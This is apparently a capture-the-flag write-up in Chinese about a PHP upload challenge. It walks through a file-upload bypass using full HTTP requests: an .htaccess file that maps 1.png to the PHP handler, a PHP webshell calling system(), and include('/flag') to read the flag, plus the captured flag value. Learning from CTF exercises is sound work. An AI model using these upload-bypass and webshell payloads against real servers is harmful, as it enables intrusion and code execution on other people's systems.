进来是一个文件上传点

1
2
3
4
5
6
POST /upload.php HTTP/1.1

------WebKitFormBoundarycHfyDys9w8AAZN6l
Content-Disposition: form-data; name="uploaded"; filename="100.png"
Content-Type: image/png

先传一个空图片文件试试水,响应会直接给出文件路径的

1
<meta charset="utf-8">/var/www/html/upload/3ebbfd8e68cc8f054ff0e3437d1686cc/100.png succesfully uploaded!

传一个php文件

1
2
3
4
5
6
POST /upload.php HTTP/1.1

------WebKitFormBoundarycHfyDys9w8AAZN6l
Content-Disposition: form-data; name="uploaded"; filename="100.php"
Content-Type: image/png

响应

1
<meta charset="utf-8">我扌your problem?

测试后发现各php类型后缀都被过滤了,但是我们可以发现返回的上传的文件所在文件夹名都是不变的

上传一个.htaccess文件

1
2
3
4
5
6
7
8
9
POST /upload.php HTTP/1.1

------WebKitFormBoundarycHfyDys9w8AAZN6l
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/png

<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>

响应

1
2
3
<meta charset="utf-8"><br />
<b>Warning</b>:  mkdir(): File exists in <b>/var/www/html/upload.php</b> on line <b>23</b><br />
/var/www/html/upload/3ebbfd8e68cc8f054ff0e3437d1686cc/.htaccess succesfully uploaded!

这时候我们只需要上传一个1.png,里面包含php代码就行了,php代码没有任何过滤的

上传

1
2
3
4
5
6
7
------WebKitFormBoundarycHfyDys9w8AAZN6l
Content-Disposition: form-data; name="uploaded"; filename="1.png"
Content-Type: image/png

<?php 
system('ls');
?>

响应

1
2
3
<meta charset="utf-8"><br />
<b>Warning</b>:  mkdir(): File exists in <b>/var/www/html/upload.php</b> on line <b>23</b><br />
/var/www/html/upload/3ebbfd8e68cc8f054ff0e3437d1686cc/1.png succesfully uploaded!

然后我们访问可以看到,很多命令执行函数是被禁用了

1
2
3

Warning: system() has been disabled for security reasons in /var/www/html/upload/3ebbfd8e68cc8f054ff0e3437d1686cc/1.png on line 2

这里使用include函数直接包含/flag

1
2
3
4
5
6
7
------WebKitFormBoundarycHfyDys9w8AAZN6l
Content-Disposition: form-data; name="uploaded"; filename="1.png"
Content-Type: image/png

<?php 
include('/flag');
?>

访问得到flag

1
flag{c5549f57-3562-44a6-9f70-fda08f2f2380}